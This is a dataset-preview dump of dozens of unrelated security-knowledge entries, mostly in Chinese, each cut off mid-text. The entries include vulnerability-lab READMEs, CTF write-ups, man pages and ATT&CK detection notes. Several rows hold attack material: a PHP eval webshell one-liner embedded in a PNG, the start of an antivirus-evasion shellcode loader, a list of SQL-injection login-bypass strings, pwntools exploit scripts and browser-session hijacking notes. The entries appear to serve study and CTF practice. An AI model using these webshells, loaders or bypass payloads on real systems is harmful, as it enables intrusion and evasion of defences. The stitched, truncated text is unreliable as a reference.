text
stringlengths
100
9.93M
category
stringclasses
11 values
# S2-009 远程代码执行漏洞 影响版本: 2.1.0 - 2.3.1.1 漏洞详情: http://struts.apache.org/docs/s2-009.html ## 测试环境搭建 ``` docker compose build docker compose up -d ``` ## 原理 > 前置阅读: 这个漏洞再次来源于s2-003、s2-005。了解该漏洞原理,需要先阅读s2-005的说明:https://github.com/phith0n/vulhub/blob/master/struts2/s2-005/README.md 参考[Struts2漏洞分析之Ognl表达式特性引发的新思路](ht...
sec-knowleage
'\" t .TH "LOGINCTL" "1" "" "systemd 231" "loginctl" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http://bugs.debia...
sec-knowleage
## TinyHosting (web, 250p, 71 solves) > A new file hosting service for very small files. could you pwn it? > > http://136.243.194.53/ ### PL [ENG](#eng-version) Pod http://136.243.194.53/ znajduje się formularz umożliwiający wysyłanie plików na serwer. W kodzie HTML znajduje się komentarz: <!-- <a href="./?src=">s...
sec-knowleage
.\" Copyright 1993 David Metcalfe (david@prism.demon.co.uk) .\" .\" Permission is granted to make and distribute verbatim copies of this .\" manual provided the copyright notice and this permission notice are .\" preserved on all copies. .\" .\" Permission is granted to copy and distribute modified versions of this .\"...
sec-knowleage
# Binary (RE) I think that the challenge was supposed to be more difficult, but due to implementation problems it was trivial for us. We are given a crackme and we are supposed to extract flag from it. We start by running the challenge (hopefully, in a safe environment): ``` ╭─msm@europa /home/msm/p4/binary ╰─$ ./main ...
sec-knowleage
**Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) > ---- # Information Gathering In the *information gathering* phase, you will gather any information you can about the organization you are attacking by using social-media networks, Google hacking, footprinting the target, and so on...
sec-knowleage
<h1 align=center dir=RTL style='text-align:center;direction:rtl;unicode-bidi: embed'><span lang=HE style='font-family:"Times New Roman",serif'>פתרון - </span><span lang=en-IL dir=LTR>OWASP IL 2018 AppSec CTF</span></h1> <p class=MsoNormal align=center dir=RTL style='text-align:center;direction: rtl;unicode-bidi:embed'>...
sec-knowleage
from pwn import * import json r=remote("anon.ctfcompetition.com", 1337) r.send("NEWACC\n"*256) r.send("NEWCARD\n"*256) r.send("ASSOC ucard0xff uaccount0x1\n") r.send("ASSOC ucard0xfe uaccount0x1\n") r.send("ASSOC ucard0x1 uaccount0x1\n") for i in range(1, 0x41): r.send("ASSOC ucard"+hex(i)+" uaccount"+hex(i+1)+"...
sec-knowleage
# Does Linux Dream of Windows? Here we can see the ASP.NET application that allows to upload files, compress them with zip and browse all our uploaded / packed files. We also have access to the source code and `apache2` directory content. The flag is hidden in 3 parts inside source files: `upload.aspx`, `upload.aspx.cs...
sec-knowleage
# strings it Category: Reversing & Binary Exploitation ## Description > I think you know what to do. A binary file was attached. ## Solution Should we even run it? Nah... ```console root@kali:/media/sf_CTFs/technion/strings_it# strings strings_it | grep cstechnion cstechnion{w3lc0Me_t0_rEv} ```
sec-knowleage
# Kibana Local File Inclusion (CVE-2018-17246) Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。 参考链接: - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 - https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/ - https://w...
sec-knowleage
# Web Sockets > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server ## Summary * [Tools](#tools) * [Exploit](#exploit) * [Using ws-harness.py](#using-ws-harness-py) * [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh) * [Labs](#labs) *...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH DF 1 2022年9月 "GNU coreutils 9.1" ...
sec-knowleage
# Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938) Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 [Ghostcat(幽灵猫)](https://www.chaitin.cn/zh/ghostcat) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或...
sec-knowleage
# Python unpickle 造成任意命令执行漏洞 ## 原理 参考文章: - http://rickgray.me/2015/09/12/django-command-execution-analysis.html - https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html ## 测试 编译及运行测试环境: ``` docker compose build docker compose up -d ``` 访问`http://your-ip:8000`,显示`Hello {username}!`。usernam...
sec-knowleage
// +build !wasm package main import ( "bytes" "context" "crypto/md5" "fmt" "github.com/golang/groupcache/lru" "github.com/golang/protobuf/proto" "log" "net/http" "os/exec" "strings" "sync" "time" ) type validator struct { cache *lru.Cache lock sync.Mutex } const validChars = "abcdefghijklmnopqrstuvwxu...
sec-knowleage
# TempImage - FLAG1 ## 0x00 Index ![](../flag0/imgs/index.jpg) ## 0x01 Generate Image Shell Run bat file [gen_imgshell.bat](./gen_imgshell.bat). ```batch copy img.png/b + webshell.php shell.png ``` Get shell.png which has the injected code. ```php <?php @eval($_POST['hacker1'])?> ``` ![](./shell.png) ## 0x02 Upload the...
sec-knowleage
# 制作带延迟的 API 数据 ### 调整数据结构 一般在项目下 src 文件夹下,创建 api 文件夹,创建需要的文件来存放数据 结构如下: ![数据结构](../img/fileApi.png) ### 写入数据 将需要的数据,写入 ```js const _comments = [ { text: '哈哈' }, { text: '嘿嘿' }, { text: '呵呵' } ] ``` 数据部分就按照自己的要求写入 ```js export default { getComments (cd) { setTimeout(() => cd(_comments), 2000) } } ``` 导出一个...
sec-knowleage
version: '2' services: discuz: image: vulhub/discuz:7.2 depends_on: - db ports: - "8080:80" db: image: mysql:5.5 environment: MYSQL_ROOT_PASSWORD: root MYSQL_DATABASE: discuz
sec-knowleage
# 跳转 --- ## 服务端跳转 跳转发生在服务器上,用户不会有任何感觉。,往往通过代码去控制,因此有些时候我们也不叫做跳转。具体的服务端跳转行为有很多,各个语言技术都有各自的特点。 - 优点:跳转行为在 server 进行, 一次 tcp 连接完成相关操作,对用户是透明的,不会造成疑惑。 - 缺点:对用户隐藏了信息,跳转行为都发生在 server 端,对 server 有压力。 --- ## 客户端跳转 **http层跳转** http 跳转是指 server 根据工作情况通过 http 返回状态码,利用 http 的重定向协议指示客户端浏览器跳转到相应页面的过程,一般返回码是 302。跳转发生在服务端发生数据给客户端过程中,用...
sec-knowleage
# Computed Shopping Assistant II Category: Reversing, 300 Points ## Description > Welcome to Computed Shopping Assistant II > > Sadly, some users found a way to abuse the system and use a secret coupon. > > This time, we have added a new coupon that can't be revealed! > > Note: the flag is in the format of CSA{...} ...
sec-knowleage
### AES基本介绍 Advanced Encryption Standard(AES),高级加密标准,是典型的块加密,被设计来取代 DES,由 Joan Daemen 和 Vincent Rijmen 所设计。其基本信息如下 - 输入:128 比特。 - 输出:128 比特。 - SPN 网络结构。 其迭代轮数与密钥长度有关系,如下 | 密钥长度(比特) | 迭代轮数 | | :--------------: | :------: | | 128 | 10 | | 192 | 12 | | 256 | 14 | ##...
sec-knowleage
# DC: 4 下载地址:https://download.vulnhub.com/dc/DC-4.zip ## 实战演练 发现靶场IP:`192.168.32.161` ![image-20220622114510707](../../.gitbook/assets/image-20220622114510707.png) 扫描对外端口 ``` ┌──(root💀kali)-[/tmp] └─# nmap -sT -sV -p1-65535 192.168.32.161 ...
sec-knowleage
'\" t .TH "RESOLVED\&.CONF" "5" "" "systemd 231" "resolved.conf" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http:...
sec-knowleage
# T1591-002-收集目标组织信息-业务关系 ## 来自ATT&CK的描述 攻击者可能会收集有关目标组织的业务关系信息,这些信息可在目标确定期间使用。有关组织业务关系的信息可能包括各种详细信息,包括已连接(并可能提升了)网络访问权限的第二或第三方组织或域(例如:托管服务提供商,承包商等)。此信息还可能揭示目标组织的硬件和软件资源的供应链和运送路径。 攻击者可以通过多种方式收集此信息,例如通过“网络钓鱼诱骗”直接诱捕。有关业务关系的信息也可能会通过在线或其他可访问的数据集(例如,社交媒体或目标组织拥有的网站)暴露给攻击者。 ## 测试案例 例如受害者的个人社交信息,微博、微信、QQ等。 例如受害组织的上下游关系,比如母子公司关系...
sec-knowleage
# 免杀实验 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 加载器 **加载器 + base64** cs 生成 Python shellcode x64 base64 加密 shellcode ```py # coding=utf-8 import base64 shellcode = open('payload.py') shellcode = shellcode.read() s1=shellcode.find("\"")+1 s2=shellcode.rfind("\"") shellcode= shellcode[s1:s2]...
sec-knowleage
### House of Orange介绍 House of Orange与其他的House of XX利用方法不同,这种利用方法来自于Hitcon CTF 2016中的一道同名题目。由于这种利用方法在此前的CTF题目中没有出现过,因此之后出现的一系列衍生题目的利用方法我们称之为House of Orange。 ### House of Orange概述 House of Orange的利用比较特殊,首先需要目标漏洞是堆上的漏洞但是特殊之处在于题目中不存在free函数或其他释放堆块的函数。我们知道一般想要利用堆漏洞,需要对堆块进行malloc和free操作,但是在House of Orange利用中无法使用free函数,因此Hous...
sec-knowleage
# T1059-001-win-检测Powershell2.0版本执行情况 ## 来自ATT&CK的描述 攻击者可能滥用PowerShell来执行命令和脚本。PowerShell是Windows操作系统中包含的功能强大的交互式命令行界面和脚本环境。攻击者可以使用PowerShell执行许多操作,包括发现信息和执行恶意代码。示例包括Start-Process可用于运行可执行文件的Invoke-Commandcmdlet和可在本地或远程计算机上运行命令的cmdlet(尽管使用PowerShell连接到远程系统需要管理员权限)。 PowerShell也可以用于从Internet下载并运行可执行文件,这些可执行文件可以从磁盘或内存中执行而无...
sec-knowleage
<?php function point($x = 0, $y = 0){ return array('x' => $x, 'y' => $y); } $P = gmp_init("0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF"); $A = gmp_init("0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC"); $B = gmp_init("0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BC...
sec-knowleage
# Lost key (crypto, 257p, 29 solved) In the task we can connect to a service running [python code](rsa_hitcon.py). We can easily deduce that it's a textbook implementation of RSA cryptosystem. We get encrypted flag from the server and then we can perform two operations: - encryption of selected payload - decryption of ...
sec-knowleage
# Wordpress 4.6 任意命令执行漏洞(PwnScriptum) ## 原理 参考 https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html ## 测试环境 编译及运行测试环境 ``` docker compose build docker compose up -d ``` 由于Mysql初始化需要一段时间,所以请等待。成功运行后,访问`http://your-ip:8080/`打开站点,初始化管理员用户名和密码后即可使用(数据库等已经配置好,且不会自动更新)。 ## 测试与EXP使用 发送如下数据...
sec-knowleage
# servlet-1 --- ## 基础概念 Java servlet 是运行在 Web 或应用服务器上的程序,作为在来自 Web 浏览器或其他 HTTP 客户机的请求和在 HTTP 服务器上的数据库或应用程序的中间层。 Servlet 其实就是一个接口,定义了 Java 的类被浏览器访问到 tomcat 的规则,后面会定义一个实现类,来实现 Servlet 接口的方法。 Servlet 为构建基于 Web 的应用程序提供了一个基于组件的、独立于平台的方法,没有 CGI 程序的性能限制。Servlet 访问 Java API 的整个家族,包括 JDBC API 来访问企业数据库。 代码文件不能放在 WEB-INF 文件目录下,放在...
sec-knowleage
pwck === 用来验证系统认证文件内容和格式的完整性 ## 补充说明 **pwck命令** 用来验证系统认证文件`/etc/passwd`和`/etc/shadow`的内容和格式的完整性。 ### 语法 ```shell pwck(选项)(参数) ``` ### 选项 ```shell -q:仅报告错误信息; -s:以用户id排序文件“/etc/passwd”和“/etc/shadow”; -r:只读方式运行指令; -R:在指定的chroot环境下检查密码文件。 ``` ### 参数 * 密码文件:指定密码文件的路径; * 影子文件:指定影子文件的路径。 ### 实例 ```shell pwck user 'ft...
sec-knowleage
# T1557-002-linux-ARP网络嗅探 ## 来自ATT&CK的描述 攻击者可能会在地址解析协议(ARP)缓存中下毒,将自己置于两个或多个联网设备的通信之间。这种活动可能被用来实现后续的攻击行为,如网络嗅探或传输数据操纵。 ARP协议用于将IPv4地址解析为链路层地址,如媒体访问控制(MAC)地址。本地网段中的设备通过使用链路层地址相互通信。如果一个联网设备没有特定联网设备的链路层地址,它可以向本地网络发出广播ARP请求,将IP地址翻译成MAC地址。拥有相关IP地址的设备会直接回复其MAC地址。发出ARP请求的联网设备就会使用以及在其ARP缓存中存储该信息。 攻击者可能会被动地等待一个ARP请求,以毒害请求设备的ARP缓...
sec-knowleage
原文 by http://thief.one/   最近遇到了很多服务器被入侵的例子,为了方便日后入侵检测以及排查取证,我查询了一些linux服务器入侵取证的相关资料,并在此总结分享,以便日后查询。   一般服务器被入侵的迹象,包括但不局限于:由内向外发送大量数据包(DDOS肉鸡)、服务器资源被耗尽(挖矿程序)、不正常的端口连接(反向shell等)、服务器日志被恶意删除等。那么既然是入侵检测,首先要判断的是服务器是否被入侵,必须排除是管理员操作不当导致的问题,因此入侵检测的第一项工作就是询问管理员服务器的异常现象,这对之后入侵类型的判断非常重要。   在询问了相关异常信息,排除了管理员操作失误等原因后,那么便可以开始正式的上服务器进...
sec-knowleage
# Bazik (crypto, 74 solved, 100p) In the challenge we can connect to a remote server. Session is basically: ``` Choose one: 1. Test the OTP 2. Get the public key 3. Get flag 1 otp should be: 687845634 encrypted dat: 764a18c52802f763f721b6b2d7fd82738e08dc660d039f1a3ee9dff84159cc102de36537d659e26e6a6e9b1088239b4db6bce649...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "CREATE TRIGGER" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME CREATE TRIGGER \- 定义一个新的触发器 .SH SYNOPSIS .sp .nf CREATE TRIGGER \fIname\fR { BEFORE | AFTER } { \fIevent\fR [ OR ... ] } ON \fItable\fR [ FOR [ EACH ] { ROW | STATEMENT }...
sec-knowleage
package org.vulhub.spring4shell.config; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.ComponentScan; import org.springframework.context.annotation.Configuration; import org.springframework.web.servlet.config.annotation.EnableWebMvc; import org.springframework.web.ser...
sec-knowleage
# 0x00 再谈万能密码登陆 万能密码基本大家都用过,各种各样的,如下 ``` 'or 1=1/* "or "a"="a "or 1=1-- "or"=" "or"="a'='a "or1=1-- "or=or" ''or'='or' ') or ('a'='a '.).or.('.a.'='.a 'or 1=1 'or 1=1-- 'or 1=1/* 'or"="a'='a 'or' '1'='1' 'or''=' 'or''=''or''=' 'or'='1' 'or'='or' 'or.'a.'='a 'or1=1-- 1'or'1'='1 a'or' 1=1-- a'or'1=1-- or 'a'='a' or 1=1--...
sec-knowleage
# T1212-windows-MS14-068-PYKEK ## 来自ATT&CK的描述 攻击者可能会利用软件漏洞来尝试收集凭据。当攻击者利用程序,服务或操作系统软件或内核本身内的编程错误来执行攻击者控制的代码时,就会利用软件漏洞。凭据和身份验证机制可能会被攻击者利用,以此作为获取有用凭据的途径或规避获取系统访问权限的过程。其中一个示例是MS14-068,它针对Kerberos,可用于使用域用户权限伪造Kerberos票证.对凭据访问的利用还可能导致特权升级,具体取决于目标过程或获取的凭据。 ## 测试案例 可参考:[内网渗透之PTH&PTT&PTK](https://www.bbsmax.com/A/A7zgkjRPz4/) #...
sec-knowleage
import sys drum = open(sys.argv[1], "rb").read() s = open("emulator", "rb").read() s = s[s.find(b"\xd0\x82\x00"):] s = s.split(b"\x00\x00\x00")[0].split(b"\x00") charset = [] for ss in s: try: sss = ss.decode() except: sss = "???" charset.append(sss) def as_trit(b): return "-0+"[b] d...
sec-knowleage
e2fsck === 用于检查第二扩展文件系统的完整性 ## 补充说明 **e2fsck命令** 用于检查第二扩展文件系统的完整性,通过适当的选项可以尝试修复出现的错误。 e2fsck执行后的传回值及代表意义如下: * 0 没有任何错误发生。 * 1 文件系统发生错误,并且已经修正。 * 2 文件系统发生错误,并且已经修正。 * 4 文件系统发生错误,但没有修正。 * 8 运作时发生错误。 * 16 使用的语法发生错误。 * 128 共享的函数库发生错误。 ### 语法 ```shell e2fsck(选项)(参数) ``` ### 选项 ```shell -a:不询问使用者意见,便自动修复文件系统; -...
sec-knowleage
.\" .\" netstat.8 .\" .\" Original: (mdw@tc.cornell.edu & dc6iq@insu1.etec.uni-karlsruhe.de) .\" .\" Modified: Bernd.Eckenfels@inka.de .\" Modified: Andi Kleen ak@muc.de .\" Modified: Tuan Hoang tqhoang@bigfoot.com .\" .\" .TH NETSTAT 8 "19 December 2000" "net-tools" "Linux Programmer's Manual" .SH NAME netstat \- 显...
sec-knowleage
# echoechoechoecho, 216p, 18 solves > Echo echo echo echo, good luck > > nc 35.246.181.187 1337 In this task we are able to input commands to be executed on server. The catch is there is a strict whitelist of allowed characters. The relevant code is: ```python if re.search(r'[^();+$\\= \']', payload.replace("echo"...
sec-knowleage
# 0x00 Browser Pivoting Browser Pivoting 的功能事劫持目标的WEB会话,浏览此代理服务器时,将保存cookie信息,验证HTTP会话身份和客户端SSL证书。 beacon 命令行 ``` beacon> help browserpivot Use: browserpivot [pid] [x86|x64] browserpivot [stop] Setup a Browser Pivot into the specified process. To hijack authenticated web sessions, make sure the process is an Inter...
sec-knowleage
# Environmental Issues (pwn or misc, depends on who you ask; 6 flags with varying solve counts) The server greets us with ``` Hello! Send me a json array of [key, val, arg] lists and I will execute `key=val bash script.sh arg' for each of them. You get a flag when you have 10, 13, and 15 solutions with unique keys. You...
sec-knowleage
--- title: Vivaldi Browser date: 2022-11-23 16:23:31.694597 background: bg-[#d54840] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 69 default keyboard shortcuts found in the Vivaldi browser --- Keyboard Shortcuts ------------------ ### Window Shortcut | Acti...
sec-knowleage
##Entry form (Web/Network, 100p) ``` http://entryform.pwn.seccon.jp/register.cgi (Do not use your real mail address.) ``` ###PL [ENG](#eng-version) Formularz pod podanym linkiem pozwalał nam na podanie adresu e-mail oraz nazwy użytkownika. Po wysłaniu podziękował nam za podanie informacji, ale w rzeczywistości niczego ...
sec-knowleage
ntsysv === 集中管理系统的各种服务 ## 补充说明 **ntsysv命令** 提供了一个基于文本界面的菜单操作方式,集中管理系统不同的运行等级下的系统服务启动状态。在RedHat各个发行版,CentOS各个版本,都自带这个工具。它具有互动式操作界面,您可以轻易地利用方向键和空格键等,开启,关闭操作系统在每个执行等级中,所要执行的系统服务。 ### 语法 ```shell ntsysv(选项) ``` ### 选项 ```shell --leve:指定运行等级; --back:在互动式界面里,显示Back钮,而非cancel钮。 ``` ### 实例 输入ntsysv命令后,出现一个交互式的管理菜单,如下: ``...
sec-knowleage
payload 分离免杀思路第一季是专门针对 x32 系统,以及针对 xp 包括以下版本。而在实战中,目标机器多为 Windows7 以上版本。而服务器以 x64 位居多。在第一季中,借助了非微软自带第三方来执行 Shellcode,这一季采取调用微软自带来执行 Shellcode,这里就会有一个好处,调用自带本身一定就会有微软的签名,从而绕过反病毒软件。 ### 介绍相关概念: Windows 自 Windows XP Media Center Edition 开始默认安装 NET Framework,直至目前的 Windows 10,最新的默认版本为4.6.00081.00。随着装机量,最新默认安装版本为4.7.2053.0。 ...
sec-knowleage
# T1593-001-搜索开放的域和网站-社交媒体 ## 来自ATT&CK的描述 入侵受害者之前,攻击者可以搜索社交媒体以收集目标确定期间使用的有关受害者的信息。社交媒体网站可能包含有关受害组织的各种信息,例如业务公告以及有关员工的角色,位置和兴趣的信息。 攻击者可以根据他们寻求收集的信息在不同的社交媒体站点中进行搜索,也可能会被动地从这些站点收集数据,并使用收集的信息来创建虚假的个人资料/群组,以诱使受害者泄露特定信息(例如:[钓鱼服务](https://contribute.knowledge.qihoo.net/detail/technique/T1598/001))(引自:Cyware Social Media)。这些来源...
sec-knowleage
### 数据提取相关介绍 这一块是流量包中另一个重点,通过对协议分析,找到了题目的关键点,如何提取数据成了接下来的关键问题 ### wireshark自动分析 `file -> export objects -> http` ### wireshark手动数据提取 `file->export selected Packet Bytes` ### tshark介绍 tshark作为wireshark的命令行版,高效快捷是它的优点,配合其余命令行工具(awk,grep)等灵活使用,可以快速定位,提取数据从而省去了繁杂的脚本编写 再看`Google CTF 2016 Forensic-200`这一题,可以通过tshark迅速完成解题 ``...
sec-knowleage
# Hacker In Disguise(for, 100 points, solved by 27) ``` r2C +17 d17 rF0 r2C -17 u17 r33 +0B d0B r43 +0C d0C rF0 r33 -0B u0B rF0 r43 -0C u0C r1B +16 d16 rF0 r1B -16 u16 r29 +2C d2C r43 +0C d0C rF0 r29 -2C u2C rF0 r43 -0C u0C r1B +16 d16 rF0 r1B -16 u16 r29 +2C d2C rF0 r29 -2C u2C r35 +1C d1C rF0 r35 -1C u1C...
sec-knowleage
### SQL注入基本概念 将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击 修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限 如果在WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前未对其进行过验证,通常就会出现 SQL 注入漏洞 ### SQL注入常用工具 Burp Suite:`http://drops.xmd5.com/static/drops/tools-1548.html` Tamper Data (Firefox addon) HackBar ...
sec-knowleage
# Guns And Roses Concert Coupon * Category: Mobile * 200 points ## Description > Everyone gives discounts for the Guns N' Roses concert. > Would you like a brainer ticket? > Just enter the right coupon. An APK file was attached. ## Solution Let's extract the APK file with `jadx`: ```console ┌──(user@kali)-[/media/s...
sec-knowleage
'''get image size app''' # coding=utf-8 import os from flask import Flask, request, redirect, flash, render_template_string, get_flashed_messages from PIL import Image from werkzeug.utils import secure_filename UPLOAD_FOLDER = '/tmp' ALLOWED_EXTENSIONS = set(['png']) app = Flask(__name__) app.config['UPLOAD_FOLDER']...
sec-knowleage
pvcreate === 将物理硬盘分区初始化为物理卷 ## 补充说明 **pvcreate命令** 用于将物理硬盘分区初始化为物理卷,以便LVM使用。 ### 语法 ```shell pvcreate(选项)(参数) ``` ### 选项 ```shell -f:强制创建物理卷,不需要用户确认; -u:指定设备的UUID; -y:所有的问题都回答“yes”; -Z:是否利用前4个扇区。 ``` ### 参数 物理卷:指定要创建的物理卷对应的设备文件名。 ### 实例 查看磁盘信息: ```shell [root@localhost ~]# fdisk -l Disk /dev/hda: 41.1 GB, 411741388...
sec-knowleage
## Calculator (ppc/Programming, 200p) ### PL Version [click for ENG](#eng-version) Zadanie polegało na połączeniu się za pomocą NC z podanym serwerem. Serwer podawał na wejściu działania i oczekiwał na ich rozwiązania. Należało rozwiązać kilkadziesiąt przykładów pod rząd aby uzyskać flagę. Działania przychodzące z serw...
sec-knowleage
# T1040-linux-网络嗅探 ## 来自ATT&CK的描述 网络嗅探是指使用系统上的网络接口来监视或捕获通过有线或无线连接发送的信息。攻击者可以将网络接口置于混杂模式以通过网络被动地访问传输中的数据,或者使用跨接端口来捕获更大量的数据。 通过该技术可以捕获的数据包括用户凭证,尤其是通过不安全的未加密协议发送的凭证;网络嗅探还可以获取到配置细节,例如运行服务,版本号以及后续横向移动或防御逃避活动所需的其他网络特征(例如:IP寻址,主机名,VLAN ID)。 ## 测试案例 tcpdump -c 5 -nnni #{网卡接口} tshark -c 5 -i #{网卡接口} ## 检测日志 linux /var/log/messa...
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: pid.n,v 1.2 2003/11/24 05:09:59 bb...
sec-knowleage
# WebNet1 Forensics, 450 points ## Description: > We found this packet capture and key. Recover the flag. ## Solution: This is the follow-up for [WebNet0](WebNet0.md). We receive a network capture file: ```console root@kali:/media/sf_CTFs/pico/WebNet1# tshark -r capture.pcap Running as user "root" and group "root". Th...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH DATE 1 2022年9月 "GNU coreutils 9.1...
sec-knowleage
# Apache SSI 远程命令执行漏洞 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用`<!--#exec cmd="id" -->`语法执行任意命令。 参考链接: - https://httpd.apache.org/docs/2.4/howto/ssi.html - https://www.w3.org/Jigsaw/Doc/User/SSI.html ## 漏洞环境 运行一个支持SSI与CGI的Apache服务器: ``` docker compose up -d ``` 环境启动后,访问`http://y...
sec-knowleage
# 同源策略(SOP) > Same origin policy --- ## 什么是SOP 同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说 Web 是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。 它的核心就在于它认为自任何站点装载的信赖内容是不安全的。当被浏览器半信半疑的脚本运行在沙箱时,它们应该只被允许访问来自同一站点的资源,而不是那些来自其它站点可能怀有恶意的资源。 浏览器的同源策略,限制了来自不同源的“document”或脚本,对当前“document”读取或设置某些属性。 | URL ...
sec-knowleage
name: Publish Docker image on: push: branches: - 'main' jobs: push_to_registry: name: Push Docker image to Docker Hub runs-on: ubuntu-latest steps: - name: Check out the repo uses: actions/checkout@v2 - name: Log in to Docker Hub uses: docker/login-action@v1 ...
sec-knowleage
# DNS ## 简介 `DNS` 通常为 `UDP` 协议,报文格式 ```sh +-------------------------------+ | 报文头 | +-------------------------------+ | 问题 (向服务器提出的查询部分) | +-------------------------------+ | 回答 (服务器回复的资源记录) | +-------------------------------+ | 授权 (权威的资源记录) | +-------------------------------+ ...
sec-knowleage
--- title: dnstracer categories: Information Gathering tags: [dns,kali linux,dnstracer,information gathering,recon] date: 2016-10-21 09:37:00 --- 0x00 dnstracer介绍 ------------- dnstracer用于获取给定主机名从给定域名服务器(DNS)的信息,并跟随DNS服务器链得到权威结果。 工具来源:http://www.mavetju.org/unix/general.php [dnstracer主页][1] | [Kali dnstracer Repo仓库][2]...
sec-knowleage
# 题目 ## 构造例子 ### 源代码 源代码如下 ```c #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <unistd.h> void showflag() { system("cat flag"); } void vuln(char *file, char *buf) { int number; int index = 0; int fd = open(file, O_RDONLY); if (fd == -1) { perror(...
sec-knowleage
.\" Automatically generated by Pod::Man v1.37, Pod::Parser v1.14 .\" .\" Standard preamble: .\" ======================================================================== .de Sh \" Subsection heading .br .if t .Sp .ne 5 .PP \fB\\$1\fR .PP .. .de Sp \" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de ...
sec-knowleage
.TH REPQUOTA 8 "1999年8月20日星期五" .UC 4 .SH NAME(名称) repquota \- 文件系统配额的汇总 .SH SYNOPSIS(总览) .B repquota [ .B \-vugs ] .IR filesystem .\|.\|. .LP .B repquota [ .B \-avugs ] .SH DESCRIPTION(描述) .IX "repquota command" "" "\fLrepquota\fP \(em summarize quotas" .IX "user quotas" "repquota command" "" "\fLrepquota\fP \(e...
sec-knowleage
route === 显示并设置Linux中静态路由表 ## 补充说明 **route命令** 用来显示并设置Linux内核中的网络路由表,route命令设置的路由主要是静态路由。要实现两个不同的子网之间的通信,需要一台连接两个网络的路由器,或者同时位于两个网络的网关来实现。 在Linux系统中设置路由通常是为了解决以下问题:该Linux系统在一个局域网中,局域网中有一个网关,能够让机器访问Internet,那么就需要将这台机器的ip地址设置为Linux机器的默认路由。要注意的是,直接在命令行下执行route命令来添加路由,不会永久保存,当网卡重启或者机器重启之后,该路由就失效了;可以在`/etc/rc.local`中添加route命...
sec-knowleage
# BugDB v3 ## [Flag0](./flag0) -- Found - What new functionality was added? - Filenames are always interesting - How do you access attachments? Hint: not via GraphQL
sec-knowleage
version: '2' services: web: image: vulhub/jupyter-notebook:5.2.2 command: start-notebook.sh --NotebookApp.token='' ports: - "8888:8888"
sec-knowleage
# Securely transporting stuff: HTTPS explained ## The problem HTTP is the protocol that the browsers use to communicate with the server. The problem with HTTP without any S is that it sends and receives data in plain text. #### Well, who can see my data in plain text? Well, anyone in your local network, your co-worker...
sec-knowleage
### Android 开发基础知识 依次阅读以下书籍,由浅入深地了解 Android 基本开发知识 - 第一行代码,阅读完前七章即可 - JNI/NDK 开发,目前尚未找到一本相关合适的指南。 - Android 编程权威指南(可选) - Android 高级进阶(可选) 在学习的过程中,个人觉得需要着重了解 Android 开发中如下知识 - Android 系统架构 - 基本源文件架构 - 基本开发方式与代码编写惯例,了解常见代码的意思。 - 了解 xml 等一些配置资源的文件格式。 **一定要搭好基本的 Android 开发环境!!!!!** - java - ddms - ndk - sdk,多安装几个版本的 sdk,5....
sec-knowleage
